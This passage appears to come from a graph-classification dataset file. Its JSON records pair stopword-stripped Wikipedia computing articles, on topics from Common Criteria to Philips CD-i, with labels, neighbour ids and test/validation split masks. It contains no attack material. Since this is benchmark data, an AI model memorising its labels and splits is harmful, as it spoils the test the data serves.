determined july 2 2014 new ccra ratified per goals outlined within 2012 vision statement major changes arrangement include common criteria generic directly provide list product security requirements features specific classes products follows approach taken itsec source debate used prescriptive approach earlier standards tcsec fips 140-2 common criteria certification guarantee security ensure claims security attributes evaluated product independently verified words products evaluated common criteria standard exhibit clear chain evidence process specification implementation evaluation conducted rigorous standard manner various microsoft windows versions including windows server 2003 windows xp certified security patches address security vulnerabilities still getting published microsoft windows systems possible process obtaining common criteria certification allows vendor restrict analysis certain security features make certain assumptions operating environment strength threats faced product environment additionally cc recognizes need limit scope evaluation order provide cost-effective useful security certifications evaluated products examined level detail specified assurance level pp evaluations activities therefore performed certain depth use time resources offer reasonable assurance intended environment microsoft case assumptions include a.peer systems toe communicates assumed management control operate security policy constraints toe applicable networked distributed environments entire network operates constraints resides within single management domain security requirements address need trust external systems communications links systems assumption contained controlled access protection profile capp products adhere based assumptions may realistic common use general-purpose operating systems claimed security functions windows products evaluated thus considered secure assumed specified circumstances also known evaluated configuration whether run microsoft windows precise evaluated configuration apply microsoft security patches vulnerabilities windows continue appear security vulnerabilities exploitable product evaluated configuration product common criteria certification voluntarily withdrawn vendor alternatively vendor re-evaluate product include application patches fix security vulnerabilities within evaluated configuration failure vendor take either steps would result involuntary withdrawal product certification certification body country product evaluated certified microsoft windows versions remain eal4+ without including application microsoft security vulnerability patches evaluated configuration shows limitation strength evaluated configuration august 2007 government computing news gcn columnist william jackson critically examined common criteria methodology us implementation common criteria evaluation validation scheme ccevs column executives security industry researchers representatives national information assurance partnership niap interviewed objections outlined article include 2006 research paper computer specialist david a. wheeler suggested common criteria process discriminates free open-source software foss -centric organizations development models common criteria assurance requirements tend inspired traditional waterfall software development methodology contrast much foss software produced using modern agile paradigms although argued paradigms align well others attempted reconcile paradigms political scientist jan kallberg raised concerns lack control actual production products certified absence permanently staffed organizational body monitors compliance idea trust common criteria it-security certifications maintained across geopolitical boundaries throughout lifetime cc universally adopted even creator nations particular cryptographic approvals handled separately canadian us implementation fips-140 cesg assisted products scheme caps uk uk also produced number alternative schemes timescales costs overheads mutual recognition found impeding operation market early 2011 nsa/css published paper chris salter proposed protection profile oriented approach towards evaluation approach communities interest form around technology types turn develop protection profiles define evaluation methodology technology type objective robust evaluation concern may negative impact mutual recognition sept 2012 common criteria published vision statement implementing large extent chris salter thoughts previous year key elements vision included",
    "neighbors": [
      10752,
      3594,
      5136,
      9745,
      8725,
      5149,
      9245,
      5674,
      3126,
      1079,
      10813,
      62,
      2558,
      1610,
      2122,
      9290,
      3671,
      9817,
      2656,
      3178,
      8302,
      5240,
      125,
      5247,
      10378,
      8854,
      8859,
      10908,
      4253,
      2206,
      5280,
      11432,
      10413,
      5816,
      7354,
      6337,
      2761,
      202,
      715,
      4303,
      7887,
      10962,
      6360,
      10467,
      8421,
      5865,
      8426,
      11036,
      9502,
      5413,
      8998,
      7983,
      11056,
      4914,
      5433,
      6977,
      1350,
      8524,
      2901,
      2904,
      10600,
      1905,
      3447,
      4988,
      9086,
      420,
      6062,
      9646,
      11184,
      8627,
      10170,
      8637,
      6593,
      6604,
      2519,
      4058,
      6110,
      3552,
      4064,
      4067,
      4074,
      2030,
      5614,
      1010,
      2045,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 8905,
    "label": 5,
    "text": "Fast_and_Secure_Protocol:fast secure protocol fast secure protocol fasp proprietary data transfer protocol fasp network-optimized network protocol developed aspera owned ibm associated client/server software packages also commonly called aspera technology patented us patent 20090063698 method system aggregate bandwidth control similar connectionless udp protocol fasp expect feedback every packet sent packets marked really lost must requested recipient result suffer much loss throughput tcp networks high latency high packet loss large organizations like ibm european nucleotide archive us national institutes health national center biotechnology information others use protocol different areas amazon also wants use protocol uploading data centers fasp built-in security mechanisms affect transmission speed encryption algorithms used based exclusively open standards transfer ssh used key exchange authentication randomly generated one-way keys discarded end transmission data encrypted decrypted immediately sending receiving aes-128 counteract attacks monitoring encrypted information long transfers aes operated cipher feedback mode secret initialization vector block addition integrity check data block takes place case example man-in-the-middle attack would noticed fasp control port tcp port 33001 port ssh uses data transfer begins udp port 33001 increments additional connection thread",
    "neighbors": [
      10242,
      3847,
      649,
      2827,
      9868,
      3218,
      4863,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      3629,
      562,
      2996,
      9909,
      6651,
      5433,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      8386,
      7364,
      1607,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      8921,
      9692,
      5469,
      5470,
      5471,
      5472,
      609,
      10341,
      10344,
      11112,
      367,
      8432,
      3323,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 8906,
    "label": 2,
    "text": "LinuxPAE64:linuxpae64 linuxpae64 port linux kernel running compatibility mode x86-64 processor kernel capable loading i386 modules device drivers supports 64-bit linux applications user mode",
    "neighbors": [
      5356,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 8907,
    "label": 2,
    "text": "Remix_OS:remix os remix os now-discontinued computer operating system personal computers x86 arm architectures prior discontinuation development shipped number 1st- 3rd-party devices remix os allowed pc users run android mobile apps compatible intel-based pc january 2016 jide announced beta version operating system called remix os pc based android-x86 — x86-port android operating system — available download free website beta version remix os pc brings hard drive installation 32-bit support uefi support ota updates except free software licensed parts available github unlike android-x86 source code remix os available public google mobile services gms removed remix mini remix os update 3.0.207 jide claimed ensure consistent experience across android devices later comments suggest compatibility issue apps resulted google requesting gms pre-loaded july 17 2017 jide announced development remix os pc well related consumer products development discontinued stating company would restructuring approach remix os transitioning away consumer space april 2019 os succeeded continued numerous forks intending continue improve project prominently phoenixos primeos three versions remix os remix os pc remix os remix ultratablet remix os remix mini remix os pc remix ultratablet remix mini remix os 3.0 device remix pro 2-in-1 tablet announced 2016 however longer made due popularity affordability os asia numerous forks/clones project made various firms notably phoenixos chinese-based chaozhuo technology primeos indian-based floydwiz technologies private limited like remixos pre-dominantly closed source lot improved features intended improve optimise os newer applications pc projects like openthos blissos intend release project open source mind openthos restricted chinese markets moment blissos based slightly modified version android",
    "neighbors": [
      4611,
      5637,
      3079,
      8719,
      3600,
      3089,
      4113,
      8209,
      7700,
      8727,
      9244,
      11294,
      543,
      11297,
      7204,
      9253,
      11305,
      1578,
      5677,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      6212,
      69,
      3654,
      5190,
      8262,
      3147,
      2125,
      4685,
      3664,
      1107,
      1110,
      8280,
      89,
      5721,
      8285,
      4192,
      2658,
      3685,
      10860,
      5742,
      2671,
      11388,
      11391,
      2179,
      2692,
      8837,
      1670,
      9353,
      5262,
      9873,
      11410,
      8857,
      10393,
      7835,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      8870,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      196,
      2763,
      3791,
      6352,
      7385,
      11481,
      8413,
      9949,
      1255,
      4841,
      6890,
      7913,
      5356,
      6380,
      8940,
      9964,
      7920,
      6898,
      5363,
      9461,
      1782,
      5369,
      6393,
      8957,
      4355,
      5380,
      5892,
      7428,
      7435,
      2828,
      2321,
      6934,
      4887,
      280,
      10009,
      10525,
      798,
      288,
      8992,
      10530,
      2852,
      2853,
      6436,
      8486,
      3369,
      10537,
      7983,
      823,
      5431,
      2875,
      3387,
      3900,
      7483,
      3903,
      10045,
      11587,
      2375,
      5959,
      11082,
      332,
      3409,
      8019,
      9048,
      5467,
      8033,
      2914,
      3940,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      7548,
      11648,
      390,
      1416,
      905,
      9610,
      10127,
      912,
      10129,
      5522,
      1427,
      10645,
      10646,
      11669,
      926,
      9119,
      2978,
      10149,
      6055,
      937,
      6057,
      7082,
      7595,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      2001,
      11221,
      9689,
      2010,
      9693,
      485,
      1516,
      5100,
      5613,
      495,
      8177,
      499,
      5620,
      8180,
      5110,
      11252,
      2045,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 8908,
    "label": 9,
    "text": "Mocl:mocl mocl programming language dialect implementation language lisp named common lisp focused mobile device platforms includes compiler runtime system currently runs ios android macos mocl first announced november 14 2012 first release timed occur lisp universal time 3581000000 june 23 2013 recent release mocl named paren mage released may 6 2014 adding support macos application creation remote read–eval–print loop repl runs mobile device",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      6201,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      3176,
      2666,
      2667,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      4779,
      5803,
      2225,
      8883,
      7867,
      4799,
      7880,
      205,
      5837,
      7896,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      9964,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      11083,
      3408,
      6994,
      1365,
      3413,
      2392,
      6493,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      2438,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 8909,
    "label": 2,
    "text": "Comparison_of_open-source_wireless_drivers:comparison open-source wireless drivers wireless network cards computers require control software make function firmware device drivers list status open-source drivers 802.11 wireless network cards following incomplete list supported wireless devices",
    "neighbors": [
      4616,
      3082,
      6670,
      10255,
      4636,
      9245,
      5663,
      10785,
      546,
      6180,
      3114,
      5677,
      8237,
      8242,
      7223,
      5177,
      6718,
      4161,
      8772,
      6213,
      3654,
      5703,
      8266,
      8268,
      589,
      1101,
      10317,
      593,
      7249,
      10329,
      9306,
      10332,
      4192,
      10851,
      6244,
      1637,
      5222,
      9320,
      10856,
      1646,
      4207,
      8816,
      5747,
      9844,
      5244,
      4734,
      9343,
      11391,
      7810,
      132,
      6276,
      7821,
      4238,
      10382,
      9366,
      2711,
      6808,
      9882,
      11418,
      3229,
      1694,
      2723,
      2212,
      4777,
      7850,
      8364,
      6834,
      692,
      10933,
      1718,
      5819,
      2236,
      5822,
      5824,
      6338,
      11459,
      1736,
      2762,
      8395,
      6352,
      5335,
      7383,
      6361,
      10455,
      10971,
      4831,
      3296,
      8928,
      9953,
      2278,
      233,
      4841,
      6890,
      7403,
      237,
      7913,
      10482,
      8439,
      5368,
      2809,
      1273,
      5369,
      6910,
      1286,
      1291,
      4367,
      10000,
      274,
      792,
      292,
      295,
      10535,
      7980,
      2864,
      11573,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      1361,
      850,
      11095,
      6491,
      7521,
      1891,
      10088,
      8554,
      10091,
      2415,
      7027,
      2421,
      2424,
      8573,
      3969,
      8066,
      900,
      8582,
      1927,
      10631,
      7561,
      394,
      4493,
      916,
      9621,
      1431,
      9625,
      1946,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      11698,
      1972,
      9151,
      10687,
      9667,
      8644,
      9671,
      457,
      1993,
      7626,
      8147,
      2006,
      3030,
      4569,
      4571,
      6622,
      2529,
      6625,
      8676,
      2021,
      998,
      1513,
      4073,
      3055,
      5105,
      3058,
      8177,
      2036,
      5620,
      2550,
      9201,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 8910,
    "label": 9,
    "text": "FOCAL-69:focal-69 focal-69 landmark version focal programming language widely publicized original version language created 1968 focal-69 created richard merrill important variable names may start letter except f f reserved functions may contain sequence letters numbers however first two characters significant instance following code sample focal new conversational language refers variable destination des variable may treated array taking subscripts -2048 2047 focal-69 contained five mathematical operators focal-69 unusual mathematical expressions could use interchangeably matched pairs establish precedence language support relative operators e.g. greater .gt. etc. language contained following built-in functions every line focal-69 program must start line number joss unlike basic line numbers real numbers focal-69 integers allowed line numbers may range 1.01 31.99 whole number referred group number group number 1 31 used command editor also allows programmer print statements group e.g. write 2 delete group e.g. erase 2 multiple statements placed single line usually behavior different statements separate lines except case loops ask command abbreviation take list strings variables echo strings store user input variables user n't enter number enters text system convert initial character unique number comment command abbreviation c creates remark command abbreviation branches execution subroutine subroutine referenced either group number line number execution resumed next statement return encountered command abbreviation f provides loop three arguments specified first initial value loop variable second increment assumed 1 omitted third value terminating value loop sample loop go command abbreviation g jumps program execution specified line number editor go command also used start program beginning specified line number command abbreviation provides conditional branch based sign expression numeric expression command take one three line numbers expression less zero execution branches first line number equal zero second line number greater zero third line number language lacked relative operators greater equal less branch x 5 one must compare x 5 quit command abbreviation q terminates execution program returns control editing environment return command abbreviation r branches execution subroutine back calling location following sample subroutine converting yes/no prompt value set command abbreviation assigns results expression specified variable type command abbreviation provides output displaying item series item consists exclamation mark group exclamation marks output carriage return line feed item consists hash mark output carriage return without line feed new lines entered program simply beginning command line number editing commands erase abbreviation e modify abbreviation write abbreviation w file command open abbreviation unusual interactive system size focal-69 supported ability chain programs use library commands program names could six characters long library command abbreviation l focal-71 added since interpreter lacked sufficient memory space store error messages richard merrill used work-around focal reported address error-detecting code pseudo floating-point number example division zero error detected code address 4333 error message 28.73 01.10 01.10 referred line number merrill clearly derived focal-69 joss focal-69 concise simplification joss simplicity required pdp-8 minicomputer opposed mainframe joss developed",
    "neighbors": [
      7076,
      1061,
      1716,
      8503,
      8732
    ],
    "mask": "Test"
  },
  {
    "node_id": 8911,
    "label": 2,
    "text": "Basic_direct_access_method:basic direct access method basic direct access method bdam access method ibm os/360 successors computer operating systems system/360 later mainframes bdam consists routines used retrieving data storing data onto direct access devices bdam available os/360 os/vs2 mvs z/os related high-end operating systems basic ibm terminology indicates lower-level access method deals data sets terms physical blocks provide either read-ahead called anticipatory buffering synchronization — user program explicitly wait completion input/output event bdam programmer directly store retrieve block specifying either actual device address relative position within data set relative block number relative track within data set system begin search bdam provides index structure file except programmed application many applications hashing randomizing function may used assign block address based key data physical keys used key last record within block must written key block bdam application program interface compared interface offered open read write close calls using file handles operating systems unix windows bdam still supported ibm 2012 dependence physical device geometry new ibm direct-access devices used z/os emulate ibm 3390 devices regardless real physical characteristics programmer specifies codice_1 data control block dcb indicate use bdam space 16 extents volume data set equivalent file reside 255 extents across multiple volumes application dependency space contiguous tracks allocate space direct data set contiguous tracks coding codice_2 dd statement direct data sets must preformatted use opening output writing blocks sequentially load dummy records load initial data basic access method bdam reads writes member data blocks i/o operation proceeds asynchronously must tested completion using codice_3 macro bdam uses standard system macros codice_4 codice_5 codice_6 codice_7 codice_3 codice_6 codice_7 macro instructions must provide block address key desired record codice_3 macro used wait completion specific operation data accessed data buffer reused possible start multiple input/output operations run concurrently records direct data set contain user-specified recorded keys 255 bytes—all keys file must length reads writes specify key addition disk address bdam search starting requested block entire area file record matching key allows multiple keys hashing track handled automatically i/o subsystem bdam accepts disk addresses either actual device addresses relative track addresses relative block numbers device addresses eight byte fields form mbbcchhr subfields binary numbers specifying device addresses makes dataset unmovable relative track addresses three byte fields form ttr subfields binary numbers relative block numbers four byte fullword binary numbers indicating block number file first block block 0 form addressing used fixed length blocks codice_12",
    "neighbors": [
      10508,
      6797,
      7053,
      6434,
      4645,
      2616,
      10040,
      1219,
      7881,
      8393,
      7244,
      10958,
      8272,
      3669,
      868,
      7272,
      4586,
      10094,
      5492,
      2168,
      11131
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8912,
    "label": 7,
    "text": "SHIWA_project:shiwa project shiwa sharing interoperable workflows large-scale scientific simulations available dcis project led lpds laboratory parallel distributed systems mta computer automation research institute project coordinator prof. dr. peter kacsuk started 1 july 2010 lasted two years shiwa project number 261585 supported grant european commission fp7 infrastructures-2010-2 call grant agreement n°261585 shiwa project developed deployed shiwa simulation platform ssp enable infrastructure workflow interoperability two levels project ended shiwa technology overtaken er-flow support action project provide sustainability extend user community base scientists disciplines invested tremendous effort exploitation distributed computing infrastructures dcis ability support compute-intensive in-silico experiments virtual organizations many dcis large user communities emerged last decade distributed european infrastructure supercomputing applications deisa niederberger mextorf 2005 egee grid enabling grids e-science egee n.d. german d-grid initiative d-grid gentzsch 2006 uk national grid service ngs ngs n.d. north american teragrid tg teragrid n.d. based different middleware stacks provide abstraction layer computer resources applications example ngs teragrid built globus toolkit foster 2006 egee glite glite n.d. deisa relies globus toolkit unicore erwin snelling 2002 d-grid executed glite globus toolkit unicore europe momentum climaxing 2010 emergence european grid initiative egi federate major european organizations related distributed-computing national grid initiatives ngis effort create next generation pan-europe dci egi face unprecedented challenges related heterogeneity national grid infrastructures resources operating middleware production dcis commonly built large number components data resources metadata catalogues authentication authorisation methods software repositories managing execution applications dcis consequently complex task moreover solutions developed one particular grid difficult port infrastructures order shield complexity researchers facilitate design in-silico experiments workflow systems widely used virtualization layer top underlying infrastructures become essential integrate expertise application user domain dci infrastructure domain order optimize support research scientific computing community current multi-dci panorama users need access different infrastructures order enlarge widen variety resources usable well share reuse domain specific resources interoperability among dcis hardly achieved middleware level though shiwa considers egi production infrastructure major dci great interest european scientists design simulate experiments in-silico directly addresses challenges related scientific experiments design simulation workflows description ii middleware heterogeneities encountered among many existing dcis workflow interoperability techniques shiwa aimed improving experience virtual research communities heavily using dcis scientific experimentation recent multiplication efforts dedicated e-infrastructures scientific simulation benefit availability massive computing data storage facilities sustain multi-disciplinary scientific challenges side effect variety non-interoperable technologies coexist enable exploitation computing infrastructures in-silico experiments europe momentum climaxing emergence egi federate major european organizations related distributed computing ngis consequently european research simulation currently hampered several interoperability issues reduce efficiency limiting knowledge expertise sharing among scientific communities shiwa designed user-centred project aiming lowering barriers among scientific communities providing services tackling interoperability issues particular shiwa work program focuses improving efficiency workflow-based in-silico experiments targeting following three objectives workflow interoperability enables execution workflows different workflow systems may span multiple heterogeneous infrastructures dcis facilitate application migration due infrastructure services workflow system evolution workflow interoperability allows workflow sharing support foster adoption common research methodologies improve efficiency reliability research reusing common methodologies increase lifetime workflows reduction development time new workflows interoperability among workflow systems permit development enactment large-scale comprehensive workflows also reduces existing gap different dcis consequently promotes cooperation among research communities exploiting dcis workflow systems enable researchers build comprehensive workflow applications dcis project consortium identified workflow interoperability promising approach bridge existing gaps among dcis workflow dci interoperability paramount importance advance quality impact scientific applications target dcis enables advanced features previously available shiwa developed workflow interoperability solutions several workflow systems namely askalon fahringer et al 2005 moteur glatard et al 2008 pegasus deelman 2005 pgrade kacsuk et al 2003 galaxy gwes kepler loni pipeline taverna proactive triana majithia et al 2004 provide access grids built glite globus middleware create production-level services run workflow-based large-scale simulations targeted middleware workflow systems depicted components bold borders figure 1.1.1 project use existing grid middleware interoperability solutions enabling access glite globus based grids austrian grid d-grid egee ngs project consortium also consider support emi-supported nordugrid advanced resource connector arc m.ellert 2007 unicore",
    "neighbors": [
      8420,
      5414,
      11353,
      8122,
      6042
    ],
    "mask": "None"
  },
  {
    "node_id": 8913,
    "label": 7,
    "text": "Mainsoft:mainsoft mainsoft software company founded 1993 develops interoperability software products microsoft windows linux/unix platforms mainsoft founded 1993 mainly propose integration products windows systems mainsoft one main providers microsoft windows interface source environment wise program licensing program microsoft allowed developers recompile run windows-based applications unix macintosh platforms wise software development kits sdks directly provided microsoft instead microsoft established partnerships several software providers turn sold wise sdks end-users wise program microsoft extended agreements mainsoft port windows media player 6.3 internet explorer unix since mainsoft activity shifted integration microsoft sharepoint ibm products ibm lotus notes ibm websphere rational jazz products focusing .net framework javaee according linkedin profile mainsoft corporation changed name harmon.ie www.harmon.ie 2010 able develop wise sdks software providers needed access windows internals source code 2004 30000 source files windows 2000 windows nt 4.0 leaked internet later discovered source leak originated mainsoft",
    "neighbors": [
      1632,
      10950,
      3560,
      6797,
      3250,
      5492,
      3573,
      823,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 8914,
    "label": 8,
    "text": "Pageview:pageview pageview page view abbreviated business pv occasionally called page impression request load single html file web page internet site world wide web page request would result web surfer clicking link another page pointing page question contrast hit refers request file web server therefore may many hits per page view since html page contain multiple files—images css etc balance page views refer number pages viewed clicked site given time page views may counted part web analytics owner site information useful see change page information way presented results visits advertisements page publishers would also interested number page views determine expected revenue ads reason term used widely internet marketing advertising page impression long measure user activity website however activity necessarily associated loading complete html page modern programming techniques serve pages means n't show http requests since page views help estimate popularity sites helps determine value advertising revenue common metric cpm stands 'cost per thousand roman numeral 1,000 commonly used metrics measure page views divided thousands cost per 1000 views used ad rates thus less cpm better deal offers advertisers however growing concern cpm trustworthy looks advertising market although cpm arrangement everyone visits site makes publishers ’ money advertiser ’ view cpm challenged comparison cpc cpa terms adverts ’ efficiency visiting mean clicking ads preferred way count page views using web analytics software measure number pages site therefore helps people receive rough estimate page views web sites also many page view measurement tools available including open source ones well licensed products despite wide range use page view come criticisms page view manipulated boosted specific purposes example recent incident called 'page view fraud compromised accuracy measurement page view boosting page view perpetrators used tool called bot buy fake page-views attention recognition feedback increasing site value result people already started building alternatives measure audiences ophan saying page view becoming passe fake page views reflect bots instead humans wikipedia provides tools allow one see many people visited wikipedia article given time period used tools instance display popular articles day wikipedia pageviews certain types articles correlate changes stock market prices box office success movies spread disease among applications datamining since search engines directly influence popular wikipedia statistics may provide unfiltered real-time view people searching web societal interests instance used gain insights public anxiety information seeking events identification concepts significant increase interest public 2015 study examines influence reddit posts wikipedia pageviews",
    "neighbors": [
      2432,
      225,
      5442,
      10756,
      6533,
      4167,
      3688,
      9036,
      5295,
      6576,
      4917,
      119,
      11578,
      5150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8915,
    "label": 9,
    "text": "Linotte:linotte linotte interpreted 4th generation programming language linotte syntax french language goal allow french-speaking children francophones little computer science experience easily learn programming slogan french know read book write computer program linotte uses non-technical vocabulary entirely french terms closer used film literature program book variable actor screen cloth instead executing book read function body starts début french start keywords languages might named things print log linotte named things like affiche french display similarly program demande ask prompt user enter value linotte also supports things like networking graphics even contains web templating engine allows mixing html linotte file much like php jsp",
    "neighbors": [
      9345,
      8644,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 8916,
    "label": 5,
    "text": "Stellar_(payment_network):stellar payment network stellar open source decentralized protocol digital currency fiat money transfers allows cross-border transactions pair currencies stellar protocol supported 501 c 3 nonprofit stellar development foundation 2014 jed mccaleb founder mt gox co-founder ripple launched network system stellar former lawyer joyce kim official launch mccaleb formed website called secret bitcoin project seeking alpha testers nonprofit stellar development foundation created collaboration stripe ceo patrick collison project officially launched july stellar received 3 million seed funding stripe stellar released decentralized payment network protocol native currency stellar launch network 100 billion stellars 25 percent would given non-profits working toward financial inclusion stripe received 2 percent 2 billion initial stellars return seed investment cryptocurrency originally known stellar later called lumens xlm august 2014 mercado bitcoin first brazilian bitcoin exchange announced would using stellar network january 2015 stellar approximately 3 million registered user accounts platform market cap almost 15 million stellar development foundation released upgraded protocol new consensus algorithm april 2015 went live november 2015 new algorithm used scp cryptocurrency protocol created stanford professor david mazières lightyear.io for-profit entity stellar launched may 2017 commercial arm company september 2017 stellar announced benefits program part stellar partnership grant program would award partners 2 million worth lumens project development september 2018 lightyear corporation acquired chain inc combined company named interstellar 2015 announced stellar releasing integration vumi open-sourced messaging platform praekelt foundation vumi uses cellphone talk time currency using stellar protocol stellar partnered cloud-based banking software company oradian april 2015 integrate stellar oradian banking platform add microfinance institutions mfis nigeria deloitte announced integration stellar 2016 build cross-border payments application deloitte digital bank december 2016 announced stellar payment network expanded include coins.ph mobile payments startup philippines icici bank india african mobile payments firm flutterwave french remittances company tempo money transfer october 2017 stellar partnered ibm klickex facilitate cross-border transactions south pacific region cross-border payment system developed ibm includes partnerships banks area december 2017 techcrunch announced stellar partnership sureremit nigerian based non-cash remittances platform stellar open-source protocol exchanging money tokens using stellar consensus protocol platform source code hosted github servers run software implementation protocol use internet connect communicate stellar servers server stores ledger accounts network transactions among accounts occur mining rather consensus process among accounts quorum slice",
    "neighbors": [
      3713,
      8706,
      9859,
      3462,
      1435,
      9245,
      9248,
      5677,
      7983,
      4280,
      1087,
      11332,
      4827,
      11612,
      8554,
      5612,
      1908,
      3323,
      764
    ],
    "mask": "Test"
  },
  {
    "node_id": 8917,
    "label": 3,
    "text": "Philips_CD-i:philips cd-i philips cd-i abbreviation compact disc interactive interactive multimedia cd player developed marketed dutch company philips supported december 1991 late 1998 created provide functionality audio cd player game console lower price personal computer cd-rom drive cost savings due lack floppy drive keyboard mouse monitor standard television used less operating system software cd-i also refers multimedia compact disc standard used cd-i console also known green book co-developed philips sony addition games educational multimedia reference titles produced interactive encyclopedias museum tours popular public internet access widespread cd-i also one earliest game systems implement internet features including subscriptions web browsing downloading e-mail online play facilitated use additional hardware modem cd-online disc renamed web-i us philips initially released britain 1995 150 us development cd-i format began 1984 first publicly announced 1986 first philips cd-i player released 1991 initially priced around us 1,000 capable playing interactive cd-i discs audio cds cd+g cd+graphics karaoke cds photo cds video cds vcds though latter required optional digital video card provide mpeg-1 decoding philips also licensed cd-i format manufacturers use also cd-i players sony intelligent discman brand philips marketed cd-i home entertainment system europe games educational machine u.s cd-i abandoned 1996 commercial failure estimated lost philips much one billion u.s. dollars american market philips first marketed cd-i family entertainment product avoided mentioning video games compete game consoles early software releases focused heavily educational music self-improvement titles games many adaptations board games connect four however system handily beaten market multimedia devices cheap low-end pcs games best-selling software 1993 philips encouraged ms-dos console developers create games introduced 250 peripheral memory support full-motion video added new consoles second controller port multiplayer games attempts develop foothold games market unsuccessful system designed strictly multimedia player thus under-powered compared gaming platforms market respects earlier cd-i games included entries popular nintendo franchises although games developed nintendo specifically mario game titled hotel mario three legend zelda games released zelda adventure nintendo philips established agreement co-develop cd-rom enhancement super nintendo entertainment system due licensing disagreements nintendo previous partner sony agreement produced prototype console called snes-cd philips nintendo never released cd-rom add-on philips still contractually allowed continue using nintendo characters applications developed using authoring software produced optimage included optimage balboa runtime libraries mediamogul second company produced authoring software script systems produced abcd-i philips also released several versions popular tv game shows cd-i including versions jeopardy hosted alex trebek name tune hosted bob goen two versions joker wild one adults hosted wink martindale one kids hosted marc summers cd-i games north america exception name tune charlie o'donnell announcer netherlands also released version lingo cd-i 1994 1993 american musician todd rundgren created first music-only fully interactive cd world order cd-i application allows user completely arrange whole album personal way 15,000 points customization cd-i series learning games edutainment targeted children infancy adolescence intended younger audience included busytown berenstain bears various others usually vivid cartoon-like settings accompanied music logic puzzles although extensively marketed philips notably via infomercial consumer interest cd-i titles remained low 1994 sales cd-i systems begun slow 1998 product line dropped plans cd-i 2 certainly present argonaut software even designated design chip sets successor cd-i however president con boonstra saw interest media area philips philips sold everything including media subsidiary polygram dutch half philips media sold softmachine released lost ride cd-i last product philips also sold french half gaming subsidiary philips media bv french publisher infogrames 1997 dutch eurodance duo 2 unlimited released cd-i compilation album 1994 called beyond limits contains standard cd tracks well cd-i-exclusive media disc large number full motion video titles dragon lair mad dog mccree appeared system one considered one stronger cd-i titles later ported pc february 1994 issue electronic gaming monthly remarked cd-i full motion video capabilities strongest point nearly best software required mpeg upgrade card mid-1996 u.s. market cd-i software dried philips given releasing titles continued publish cd-i games europe console still held popularity home market exhausted philips tried success position technology solution kiosk applications industrial multimedia addition consumer models professional development players sold philips interactive media systems vars philips marketed several cd-i player models also exist number hard-to-categorize models fw380i integrated mini-stereo cd-i player 21tcdi30 television built-in cd-i device cd-i 180/181/182 modular system first cd-i system produced collaboration kyocera 1988 actual debut cd-i addition philips several manufacturers produced cd-i players including philips subsidiary magnavox goldstar lg electronics digital video systems memorex grundig saab electric sony intelligent discman hybrid home/portable cd-i player kyocera nbs highscreen bang olufsen produced television built-in cd-i device beocenter av5 recognizing growing need among marketers networked multimedia philips partnered 1992 amsterdam-based cdmatics develop telecd-i also telecd concept cd-i player connected network pstn internet enabling data-communication rich media presentation dutch grocery chain albert heijn mail-order company early adopters introduced award-winning telecd-i applications home-shopping home-delivery services cdmatics also developed special philips telecd-i assistant set software tools help worldwide multimedia industry develop implement telecd-i telecd-i world first networked multimedia application time introduction 1996 philips acquired source code rights cdmatics 1995 philips introduced cd-online service provided cd-i full internet access 14.4k modem including online shopping email support networked multiplayer gaming select cd-i games service required cd-i player dv cartridge internet starter kit initially retailed £99.99 andy stout writer official cd-i magazine explained cd-online cd-online service went live uk october 25 1995 march 1996 netherlands 399 guilders system reportedly scheduled launch us web-i august 1996 although philips aggressively promoted cd-i august 1993 computer gaming world reported skepticism persists long-term prospects compared platforms like ibm pc compatibles apple macintosh sega genesis magazine stated january 1994 despite philips new emphasis games cd-i still answer hardcore gamers console may yet surprise us future recommended cd-i video cartridge needing buy new console price right software support 3do probably better could wait months early 1995 review system gamepro stated inconsistent game quality puts cd-i disadvantage high-powered game producers late 1995 review next generation criticized philips approach marketing cd-i hardware unit excels practically nothing except fmv addition 200 digital video cartridge magazine noted philips yet officially discontinued cd-i dead intents purposes citing evidence fact though philips large booth 1995 electronic entertainment expo cd-i hardware software display next generation scored console one five stars discontinuation retrospectively cd-i overwhelmingly panned critics blasted graphics games controls microsoft ceo bill gates admitted initially worried cd-i due philips heavy support device two-pronged attack games console pc markets retrospect device kind basically got caught middle terrible game machine terrible pc cd-i various controllers ranked fifth worst video game controller ign editor craig harris pc world ranked fourth list 10 worst video game systems time gamepro.com listed number four list 10 worst-selling consoles time 2008 cnet listed system list worst game console ever 2007 gametrailers ranked philips cd-i fourth worst console time top 10 worst console lineup games heavily criticized include hotel mario zelda adventure egm 